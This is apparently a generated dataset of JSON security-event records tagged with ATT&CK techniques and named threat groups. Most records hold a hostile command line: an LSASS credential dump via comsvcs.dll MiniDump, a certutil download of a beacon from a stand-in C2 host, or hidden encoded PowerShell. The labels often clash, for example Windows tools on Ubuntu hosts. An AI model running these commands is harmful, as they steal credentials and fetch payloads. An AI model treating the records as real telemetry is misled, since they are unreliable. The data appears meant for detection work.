{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Execution"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260404T073748000Z_0017943","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.151.136.102","name":"IAM-ROLE-1T0B1IEKXW","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17943UNC4841T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.141.161.213","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2319 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-01-09T12:25:58.000Z","user":{"name":"CORP\\y33yrvhreaay","sid":"S-1-5-21-409314814-428239157-6276"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250505T094716000Z_0017945","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.142.132.147","name":"AZURE-VM-8LOC5DTG80","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17945UNC4841T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.75.209.225","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-10T02:35:28.000Z","user":{"name":"azuread\\ghuuunu1xmot","sid":"S-1-5-21-183966850-459803132-2435"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Persistence"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20251116T131011000Z_0017947","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.183.249.229","name":"AZURE-VM-2ZXBV3RW12","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17947Volt TyphoonT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.63.248.11","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-19T22:09:46.000Z","user":{"name":"CORP\\0ejc86vjxck8","sid":"S-1-5-21-449673237-300933741-4938"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20260425T160818000Z_0017949","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.13.199.230","name":"APP-WEB-82NQQY4DHV","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17949Scattered SpiderT1570"},"network":{"domain":"github.com","dst_ip":"1.7.185.40","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-02T17:44:43.000Z","user":{"name":"CORP\\vnloihjrnhtp","sid":"S-1-5-21-814907662-826805843-4924"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260111T213812000Z_0017951","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.13.216.161","name":"APP-WEB-C2AT3ELS9Z","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17951Scattered SpiderT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.98.229.112","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-19T16:28:56.000Z","user":{"name":"i-xwr27nropq13","sid":"S-1-5-21-905948614-423228991-9007"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Impact","Persistence"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260918T194439000Z_0017953","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.34.153.47","name":"IAM-ROLE-XLV4EVXVE2","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17953Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.180.49.7","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2534 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-09T18:16:54.000Z","user":{"name":"azuread\\wxsis5hn7mtv","sid":"S-1-5-21-787835368-440057250-8954"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250603T043329000Z_0017955","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.23.111.130","name":"DB-ORACLE-WBSW8OIKBV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17955Lapsus$T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.40.155.72","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-21T21:34:17.000Z","user":{"name":"svc_rjf3tnbnandc","sid":"S-1-5-21-287411580-682937957-5240"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Execution"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250807T183201000Z_0017957","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.149.156.110","name":"AZURE-VM-VIQT3NMNOE","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17957Lapsus$T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.84.116.37","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1999 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-11T13:17:03.000Z","user":{"name":"azuread\\xzi9bmtjr25b","sid":"S-1-5-21-685503521-311729757-7180"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection","Reconnaissance","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260702T173811000Z_0017959","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.25.212.212","name":"WIN-FIN-SRV-1H9ROZGNQ3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17959UNC4841T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.79.81.187","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-20T22:58:07.000Z","user":{"name":"svc_er6imkq2xzjx","sid":"S-1-5-21-422648102-757135171-4168"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20260420T233320000Z_0017961","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.240.38.219","name":"APP-WEB-T22HKX6N5P","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17961Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.187.50.71","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3384 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-23T20:50:42.000Z","user":{"name":"CORP\\jscbdnozj5hw","sid":"S-1-5-21-481717441-286319428-7471"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20261219T092338000Z_0017963","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.173.117.223","name":"EC2-INST-V8ND9PY37S","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17963APT29T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.118.129.179","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-23T04:56:26.000Z","user":{"name":"svc_qdf5dqyqaly7","sid":"S-1-5-21-380494212-110596370-2133"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Defense Evasion","Persistence"],"technique_id":"T1531"},"event_id":"evt_lapsus_20250405T153938000Z_0017965","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.218.148.246","name":"AZURE-VM-SJ2UK4OZQV","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17965Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.179.199.216","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-05T22:39:55.000Z","user":{"name":"CORP\\em2sorg9yn9c","sid":"S-1-5-21-248431239-376079115-3713"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260421T224553000Z_0017967","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.117.223.170","name":"DB-ORACLE-OC1PV4QWZ9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17967FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.106.75.59","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-28T08:18:18.000Z","user":{"name":"CORP\\qgplbxebhhww","sid":"S-1-5-21-477450677-387701236-3905"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20251118T032623000Z_0017969","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.146.36.82","name":"EC2-INST-S2HT2Y7Z1A","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17969UNC4841T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.10.182.99","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3854 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-05T14:18:47.000Z","user":{"name":"i-ckxrsa6gepm9","sid":"S-1-5-21-784284190-968343108-6836"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Collection"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20251021T063928000Z_0017971","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.51.124.189","name":"EC2-INST-VTRX8ZM9G9","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17971Mustang PandaT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.69.2.127","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-09T20:32:00.000Z","user":{"name":"svc_hgtcwb5fyexh","sid":"S-1-5-21-600448475-553340282-4062"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20261230T194559000Z_0017973","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.189.225.228","name":"WIN-FIN-SRV-Y65G6THSP7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17973UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.45.178.115","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3777 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-12-21T15:27:45.000Z","user":{"name":"arn:aws:iam::j4lw3l0ou1wk","sid":"S-1-5-21-265702978-564747810-3349"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Collection","Exfiltration"],"technique_id":"T1570"},"event_id":"evt_apt29_20250521T160348000Z_0017975","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.161.238.93","name":"WIN-FIN-SRV-MCKKNNQN8B","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17975APT29T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.52.21.206","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-07T10:04:22.000Z","user":{"name":"i-hd9a9x2bszxx","sid":"S-1-5-21-835927991-445226911-3965"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Exfiltration","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_apt41_20250917T113555000Z_0017977","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.177.81.146","name":"AZURE-VM-T3LV2D59PM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17977APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.121.242.187","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-23T02:54:01.000Z","user":{"name":"azuread\\qimlu49l2htj","sid":"S-1-5-21-865319279-674271052-2225"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250713T122613000Z_0017979","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.69.99.64","name":"WIN-FIN-SRV-F3PX7DNO79","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17979Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.144.10.105","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-10-16T01:05:45.000Z","user":{"name":"svc_vgpo13jmtrj4","sid":"S-1-5-21-876916433-588622024-5434"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Execution"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20250301T182157000Z_0017981","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.247.16.117","name":"APP-WEB-WCSFG73C9X","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17981Scattered SpiderT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.0.8.100","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3509 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-11T17:41:25.000Z","user":{"name":"i-9n12qoif7uik","sid":"S-1-5-21-395471999-925235827-7086"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Initial Access","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250801T185042000Z_0017983","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.169.132.38","name":"DB-ORACLE-1K10UZYF41","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17983APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.115.127.91","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-04-21T21:31:36.000Z","user":{"name":"arn:aws:iam::l1aw4nfzopee","sid":"S-1-5-21-974375086-523602948-4784"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Collection","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20260221T190151000Z_0017985","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.21.110.103","name":"EC2-INST-H3G7ES3LLT","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17985Mustang PandaT1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.188.43.203","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1712 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-03T21:53:25.000Z","user":{"name":"arn:aws:iam::xoowscqpx9pq","sid":"S-1-5-21-154043893-456020216-6738"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_fin7_20260518T001111000Z_0017987","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.128.117","name":"EC2-INST-TRA8959OX4","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17987FIN7T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.75.94.212","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-27T19:16:35.000Z","user":{"name":"svc_ntv537ye04zf","sid":"S-1-5-21-552809012-355064222-6874"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Credential Access","Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250123T142905000Z_0017989","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.205.86.36","name":"DB-ORACLE-H0J28EA0IZ","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17989Volt TyphoonT1546.003"},"network":{"domain":"github.com","dst_ip":"1.118.75.117","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 648 C:\\temp\\lsass.dmp 